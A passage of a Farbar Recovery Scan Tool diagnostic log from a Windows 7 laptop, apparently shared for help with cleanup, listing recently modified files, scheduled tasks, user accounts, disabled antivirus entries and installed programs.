2019-11-08 21:02 - 2019-11-11 01:28 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2019-10-22 01:05 - 2019-10-22 01:05 - 000000935 _____ C:\Users\Public\Desktop\Mp3tag.lnk
2019-10-22 01:05 - 2019-10-22 01:05 - 000000935 _____ C:\ProgramData\Desktop\Mp3tag.lnk
 
==================== One month (modified) ==================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2019-11-19 01:54 - 2009-07-14 05:45 - 000016816 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-11-19 01:54 - 2009-07-14 05:45 - 000016816 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-11-19 01:48 - 2018-07-17 21:31 - 000000000 ____D C:\Users\Vladana\AppData\Local\AVAST Software
2019-11-19 01:44 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-11-18 19:45 - 2013-03-19 22:08 - 000746014 _____ C:\Windows\system32\perfh00C.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000740656 _____ C:\Windows\system32\perfh015.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000714178 _____ C:\Windows\system32\prfh0416.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000684052 _____ C:\Windows\system32\perfh00E.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000607286 _____ C:\Windows\system32\perfh008.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000494812 _____ C:\Windows\system32\perfh014.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000479312 _____ C:\Windows\system32\perfh001.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000417076 _____ C:\Windows\system32\perfh011.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000171600 _____ C:\Windows\system32\perfc00E.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000156198 _____ C:\Windows\system32\perfc015.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000149906 _____ C:\Windows\system32\perfc00C.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000147982 _____ C:\Windows\system32\prfc0416.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000122426 _____ C:\Windows\system32\perfc011.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000111454 _____ C:\Windows\system32\perfc008.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000095730 _____ C:\Windows\system32\perfc014.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000095098 _____ C:\Windows\system32\perfc001.dat
2019-11-18 19:45 - 2013-03-19 15:24 - 000481800 _____ C:\Windows\system32\perfh00B.dat
2019-11-18 19:45 - 2013-03-19 15:24 - 000101846 _____ C:\Windows\system32\perfc00B.dat
2019-11-18 19:45 - 2009-07-14 06:13 - 007211860 _____ C:\Windows\system32\PerfStringBackup.INI
2019-11-18 19:45 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2019-11-18 19:28 - 2013-02-21 15:11 - 000000000 ____D C:\Program Files (x86)\Nokia
2019-11-18 13:46 - 2017-09-05 15:33 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Mp3tag
2019-11-18 02:26 - 2014-10-19 23:52 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\vlc
2019-11-17 22:16 - 2013-02-21 01:36 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Azureus
2019-11-17 02:16 - 2013-02-20 22:41 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2019-11-16 17:47 - 2019-05-23 11:52 - 000003160 _____ C:\Windows\system32\Tasks\{EF41326F-22E8-4DCF-A020-C6061802D389}
2019-11-16 17:47 - 2018-09-06 18:23 - 000003334 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2019-11-16 17:47 - 2018-09-06 18:23 - 000003206 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2019-11-16 17:47 - 2018-03-14 03:40 - 000004470 _____ C:\Windows\system32\Tasks\Adobe Flash Player NPAPI Notifier
2019-11-16 17:47 - 2016-03-23 08:37 - 000003052 _____ C:\Windows\system32\Tasks\SafeZone scheduled Autoupdate 1458718670
2019-11-16 17:47 - 2016-01-03 12:45 - 000003652 _____ C:\Windows\system32\Tasks\DivXUpdate
2019-11-16 17:47 - 2015-12-03 22:42 - 000000000 ____D C:\Windows\system32\Tasks\AVAST Software
2019-11-16 17:47 - 2015-06-10 12:59 - 000004458 _____ C:\Windows\system32\Tasks\Adobe Flash Player PPAPI Notifier
2019-11-16 17:47 - 2015-06-10 12:47 - 000003850 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1433936833
2019-11-16 17:47 - 2015-02-06 11:56 - 000003432 _____ C:\Windows\system32\Tasks\RealDownloader Update Check
2019-11-16 17:47 - 2015-01-06 11:27 - 000004476 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
2019-11-16 17:47 - 2014-07-14 00:42 - 000003226 _____ C:\Windows\system32\Tasks\{375818AB-9982-4CB0-BF65-E9B77DBF0F5C}
2019-11-16 17:47 - 2013-03-15 02:37 - 000003192 _____ C:\Windows\system32\Tasks\{6243CAD4-3DB1-45D4-933D-254A23B4CA85}
2019-11-16 17:47 - 2013-02-28 00:53 - 000003390 _____ C:\Windows\system32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-16 17:47 - 2013-02-21 21:07 - 000003508 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000UA
2019-11-16 17:47 - 2013-02-21 21:07 - 000003236 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000Core
2019-11-16 17:47 - 2013-02-20 22:41 - 000004312 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2019-11-16 17:46 - 2019-05-23 15:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2019-11-16 16:21 - 2013-02-20 22:23 - 000000000 ____D C:\Users\Vladana\AppData\Local\Microsoft Help
2019-11-16 15:55 - 2014-08-18 11:50 - 000000000 ____D C:\Program Files (x86)\Freemake
2019-11-16 14:54 - 2017-07-25 15:43 - 000000000 ____D C:\Users\Vladana\AppData\Local\FreemakeVideoConverter
2019-11-16 14:54 - 2014-08-18 11:50 - 000000000 ____D C:\ProgramData\Freemake
2019-11-16 13:48 - 2017-08-25 02:23 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ZenGuard GmbH
2019-11-15 19:04 - 2017-08-25 02:23 - 000000000 ____D C:\Users\Vladana\AppData\Local\SquirrelTemp
2019-11-15 17:02 - 2013-02-20 21:51 - 000000000 ____D C:\Users\Vladana\AppData\Local\Google
2019-11-13 21:40 - 2013-02-20 22:41 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2019-11-13 21:40 - 2013-02-20 22:41 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2019-11-13 21:40 - 2013-02-20 22:41 - 000000000 ____D C:\Windows\system32\Macromed
2019-11-11 15:42 - 2016-09-25 12:57 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Apowersoft
2019-11-11 01:33 - 2017-03-14 00:19 - 000004168 _____ C:\Windows\system32\Tasks\Avast Emergency Update
2019-11-11 01:28 - 2013-02-20 21:52 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-11-09 12:32 - 2017-04-16 10:33 - 000000000 ____D C:\Users\Vladana\AppData\LocalLow\Mozilla
2019-11-08 01:14 - 2018-09-06 18:24 - 000002184 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-11-08 01:14 - 2018-09-06 18:24 - 000002143 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-11-08 01:14 - 2018-09-06 18:24 - 000002143 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2019-11-07 18:44 - 2015-06-10 12:47 - 000000000 ____D C:\Program Files (x86)\Opera
2019-11-06 11:30 - 2016-09-05 13:58 - 000001271 _____ C:\Users\Vladana\Desktop\marker.txt
2019-11-05 05:03 - 2013-02-20 21:52 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Mozilla
2019-11-05 00:06 - 2015-10-15 21:00 - 000000000 ____D C:\Program Files (x86)\Google
2019-10-22 01:05 - 2017-09-05 14:37 - 000000000 ____D C:\Program Files (x86)\Mp3tag
 
==================== Files in the root of some directories ========
 
2013-04-12 20:07 - 2014-11-17 02:37 - 000000580 _____ () C:\Users\Vladana\AppData\Roaming\AutoGK.ini
2013-03-15 02:55 - 2014-11-18 03:36 - 000010752 _____ () C:\Users\Vladana\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-05-19 01:43 - 2015-05-19 01:43 - 000247298 _____ () C:\Users\Vladana\AppData\Local\Tempdivx84f8
2015-07-02 22:06 - 2015-07-02 22:06 - 000043682 _____ () C:\Users\Vladana\AppData\Local\Tempdivxffab
 
==================== SigCheck ============================
 
(There is no automatic fix for files that do not pass verification.)
 
 
LastRegBack: 2019-11-17 06:56
==================== End of FRST.txt ========================
 
 
Copy of Addition.txt:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-11-2019
Ran by Vladana (19-11-2019 01:58:18)
Running from C:\Users\Vladana\Desktop
Windows 7 Ultimate (X64) (2013-02-20 19:53:32)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-7682389-3612777877-391866582-500 - Administrator - Disabled)
Guest (S-1-5-21-7682389-3612777877-391866582-501 - Limited - Disabled)
Vladana (S-1-5-21-7682389-3612777877-391866582-1000 - Administrator - Enabled) => C:\Users\Vladana
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avast Antivirus (Disabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Disabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4K Video Downloader (HKLM-x32\...\4K Video Downloader) (Version:  - Open Media LLC)
ACDSee 10 Photo Manager (HKLM-x32\...\{F8B98EB6-FC06-45BF-87D4-9784E0408611}) (Version: 10.0.219 - ACD Systems International)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20063 - Adobe Systems Incorporated)
Adobe Flash Player 32 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 32.0.0.293 - Adobe)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.293 - Adobe)
Adobe Flash Player 32 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 32.0.0.293 - Adobe)
Adobe Shockwave Player 12.3 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.3.4.204 - Adobe Systems, Inc.)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version:  - ALPS ELECTRIC CO., LTD.)
Apowersoft Online Launcher version 1.6.1 (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\{20BF67A8-D81A-4489-8225-FABAA0896E2D}_is1) (Version: 1.6.1 - APOWERSOFT LIMITED)
Auto Gordian Knot 2.55 (HKLM-x32\...\AutoGK) (Version: 2.55 - len0x)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 19.8.2393 - AVAST Software)
AVI ReComp 1.5.5 (HKLM-x32\...\AVI ReComp) (Version: 1.5.5 - Mateusz Gola (aka Prozac))
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version:  - )
Awesomium.NET Redistribution Module (HKLM-x32\...\{C34CAF35-6198-4EEB-970F-C61FC51D23BD}) (Version: 1.7.4.2 - ©2014 Awesomium Technologies LLC) Hidden
Bigasoft Total Video Converter 3.7.24.4700 (HKLM-x32\...\{a72ce741-1f32-4d79-bffb-a714375c678d}_is1) (Version:  - Bigasoft Corporation)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DivX Setup (HKLM\...\DivX Setup) (Version: 10.8.7.0 - DivX, LLC)
FileLab Plugin 1.1.33 (HKLM-x32\...\{6AC5F630-9453-433D-90FF-BB3A8E4F8960}) (Version: 1.1.33 - FileLab)
FJ Camera (HKLM-x32\...\{399C37FB-08AF-493B-BFED-20FBD85EDF7F}) (Version: 5.8.52032.0_WHQL - Sonix)
Freemake Video Converter version 4.1.10 (HKLM-x32\...\Freemake Video Converter_is1) (Version: 4.1.10 - Mixbyte Inc.)
Fujitsu Hotkey Utility (HKLM-x32\...\{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED) Hidden
Fujitsu Hotkey Utility (HKLM-x32\...\InstallShield_{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED)
Fujitsu MobilityCenter Extension Utility (HKLM\...\{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 4.01.00.000 - FUJITSU LIMITED) Hidden
Fujitsu MobilityCenter Extension Utility (HKLM-x32\...\InstallShield_{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 4.01.00.000 - FUJITSU LIMITED)
Fujitsu System Extension Utility (HKLM\...\{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED) Hidden
Fujitsu System Extension Utility (HKLM-x32\...\InstallShield_{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 78.0.3904.97 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.341 - Google LLC) Hidden
Google Video Support Plugin (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Version: 19.11.1200.0 - Google, LLC.)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version:  - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2696 - Intel Corporation)
Intel® PROSet/Wireless for Bluetooth® + High Speed (HKLM\...\{705EE775-5776-48FD-B704-C3C9CF535420}) (Version: 15.1.1.0170 - Intel Corporation)
Intel® PROSet/Wireless Software for Bluetooth® Technology (HKLM\...\{F0932859-AA60-459E-B843-0BDECA34E2C7}) (Version: 2.0.0.0086 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.0.0.1032 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{BAA0BE9B-9E6D-4802-91CB-FB7ED5CD4BEF}) (Version: 15.01.1500.1034 - Intel Corporation)
iPool (HKLM-x32\...\iPool) (Version: 2.2.03 - Memir Games)
iSnooker 2.2.60 (HKLM-x32\...\isnooker_memir_is1) (Version: 2.2.60 - Memir Games Ltd)
Java 8 Update 221 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180221F0}) (Version: 8.0.2210.11 - Oracle Corporation)
KeepVid Pro(Build 6.3.2.0) (HKLM-x32\...\KeepVid Pro_is1) (Version: 6.3.2.0 - KeepVid Studio)
LIFEBOOK Application Panel (HKLM\...\{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED) Hidden
LIFEBOOK Application Panel (HKLM-x32\...\InstallShield_{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED)
Malwarebytes version 3.4.5.2467 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.4.5.2467 - Malwarebytes)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Save as PDF or XPS Add-in for 2007 Microsoft Office programs (HKLM-x32\...\{90120000-00B2-0409-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\SkyDriveSetup.exe) (Version: 17.0.2006.0314 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{5BABDA39-61CF-41EE-992D-4054B6649A9B}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{ED6C77F9-4D7E-447C-9EC0-9A212D075535}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Mozilla Firefox 70.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 70.0.1 (x64 en-US)) (Version: 70.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 70.0.1.7242 - Mozilla)
Mp3tag v2.99a (HKLM-x32\...\Mp3tag) (Version: 2.99a - Florian Heidenreich)
MSVC80_x64_v2 (HKLM\...\{4D668D4F-FAA2-4726-834C-31F4614F312E}) (Version: 1.0.3.0 - Nokia) Hidden
MSVC80_x86_v2 (HKLM-x32\...\{6D3245B1-8DB8-4A23-9CD2-2C90F40ABAF6}) (Version: 1.0.3.0 - Nokia) Hidden
MSVC90_x64 (HKLM\...\{AB071C8B-873C-459F-ACA9-9EBE03C3E89B}) (Version: 1.0.1.2 - Nokia) Hidden
MSVC90_x86 (HKLM-x32\...\{AF111648-99A1-453E-81DD-80DBBF6DAD0D}) (Version: 1.0.1.2 - Nokia) Hidden
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Noise Reduction Plug-In 2.0 (HKLM-x32\...\{B94515E1-2DD6-11E2-849E-F04DA23A5C58}) (Version: 2.0.515 - Sony)
Nokia Connectivity Cable Driver (HKLM-x32\...\{29373274-977E-413C-A4DE-DC0F8E80C429}) (Version: 7.1.172.0 - Nokia)
Nokia Software Updater (HKLM-x32\...\{7130468A-F53F-4698-8C09-A339EA3B05E6}) (Version: 3.0.655 - Nokia)
Nokia Suite (HKLM-x32\...\{88B6F9DE-C80F-4A70-ACF6-BEE933679170}) (Version: 3.8.54.0 - Nokia) Hidden
Nokia Suite (HKLM-x32\...\Nokia Suite) (Version: 3.8.54.0 - Nokia)
Opera Stable 64.0.3417.92 (HKLM-x32\...\Opera 64.0.3417.92) (Version: 64.0.3417.92 - Opera Software)
PC Connectivity Solution (HKLM-x32\...\{6D01D1B1-17BD-4F10-BB11-F08F0C47D42B}) (Version: 12.0.109.0 - Nokia)
PeaZip 5.2.0 (HKLM-x32\...\{5A2BC38A-406C-4A5B-BF45-6991F9A05325}_is1) (Version:  - Giorgio Tani)
Plugfree NETWORK (HKLM\...\{7BA64D21-EE46-4a9a-8145-52B0175C3F86}) (Version: 6.2.0.1 - FUJITSU LIMITED)
Plugfree NETWORK (HKLM\...\{E1C056BE-ACC9-4FCF-B37D-55A46648B369}) (Version: 6.2.001 - FUJITSU LIMITED) Hidden
Power Saving Utility (HKLM-x32\...\{49A588CF-5FD4-4774-BFBF-0764287DE82B}) (Version: 32.01.10.043 - FUJITSU LIMITED)
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
RealDownloader (HKLM-x32\...\{6FCD4D5A-20B9-4D79-ABA5-4E7048944025}) (Version: 17.0.15.4 - RealNetworks, Inc.) Hidden
RealDownloader (HKLM-x32\...\{e6171278-8759-449d-9e0b-c1825debc2ad}) (Version: 17.0.15.7 - RealNetworks) Hidden
RealDownloader (HKLM-x32\...\{FBEFDC9E-F8FB-4B66-A78B-09B7B380D59D}) (Version: 17.0.15.7 - RealNetworks) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (HKLM-x32\...\{7770E71B-2D43-4800-9CB3-5B6CAAEBEBEA}) (Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (HKLM\...\{21E47F47-C9A7-4454-BA48-388327B0EA00}) (Version: 10.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (HKLM-x32\...\{AAECF7BA-E83B-4A10-87EA-DE0B333F8734}) (Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer Cloud (HKLM-x32\...\RealPlayer 17.0) (Version: 17.0.15 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.53.216.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6526 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7601.30129 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (HKLM-x32\...\{28C2DED6-325B-4CC7-983A-1777C8F7FBAB}) (Version: 1.1.0 - RealNetworks, Inc.) Hidden
SafeZone Stable 1.48.2066.44 (HKLM-x32\...\SafeZone 1.48.2066.44) (Version: 1.48.2066.44 - Avast Software) Hidden
SolveigMM AVI Trimmer (HKLM-x32\...\SolveigMM AVI Trimmer 2.0.1210.11) (Version: 2.0.1210.11 - Solveig Multimedia)
Sound Forge Pro 10.0 (HKLM-x32\...\{8EF5E2B0-2DD1-11E2-89A5-F04DA23A5C58}) (Version: 10.0.507 - Sony)
Spotify (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Spotify) (Version: 1.1.8.439.g8502297d - Spotify AB)
Subtitle Edit 3.4.3 (HKLM-x32\...\SubtitleEdit_is1) (Version: 3.4.3.0 - Nikse)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Total Commander (Remove or Repair) (HKLM-x32\...\Totalcmd) (Version:  - )
Unity Web Player (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
UpdateService (HKLM-x32\...\{E3AE96D6-E196-45B4-AF62-2B41998B9E37}) (Version: 1.0.0 - RealNetworks, Inc.) Hidden
VC80CRTRedist - 8.0.50727.6195 (HKLM-x32\...\{933B4015-4618-4716-A828-5289FC03165F}) (Version: 1.2.0 - DivX, Inc) Hidden
VCRedistSetup (HKLM-x32\...\{3921A67A-5AB1-4E48-9444-C71814CF3027}) (Version: 1.0.0 - Nero AG) Hidden
Video Download Capture version 6.2.8 (HKLM-x32\...\{b3336f66-e079-4ff6-abdb-51e2fab781d5}_is1) (Version: 6.2.8 - APOWERSOFT LIMITED)
Video Downloader (HKLM-x32\...\{62796191-6F12-4ABE-BA8B-B4D4A266C997}) (Version: 1.0.0 - RealNetworks) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN)
VobSub v2.23 (Remove Only) (HKLM-x32\...\VobSub) (Version:  - )
Vuze (HKLM-x32\...\8461-7759-5462-8226) (Version: 5.7.6.0 - Azureus Software, Inc.)
Winamp (HKLM-x32\...\Winamp) (Version: 5.623  - Nullsoft, Inc)
Winamp Detector Plug-in (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc)
Windows Driver Package - Nokia pccsmcfd LegacyDriver  (05/31/2012 7.1.2.0) (HKLM\...\62BBD193ADFDBB228C7E1ADB56463F5732FF7F6F) (Version: 05/31/2012 7.1.2.0 - Nokia)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
Wondershare Filmora(Build 8.5.3) (HKLM\...\Wondershare Filmora_is1) (Version:  - Wondershare Software)
Wondershare Helper Compact 2.5.2 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.5.2 - Wondershare)
XviD MPEG4 Video Codec (remove only) (HKLM-x32\...\XviD MPEG4 Video Codec) (Version:  - )
ZD Soft Screen Recorder 11.2.0 (HKLM-x32\...\{05289906-8CDE-44FD-9FA5-95866BF511A9}) (Version: 11.2.0.0 - ZD Soft)
 
==================== Custom CLSID (Whitelisted): ==============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{86508D42-E5D7-4D10-9C6F-D427AEEB85B5}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A804CF1A-91E5-4F0C-9E8C-DB39E74056DD}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.23\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EA724FD3-844D-43A9-A8C9-A5BC35FC20E4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.17\psuser_64.dll => No File
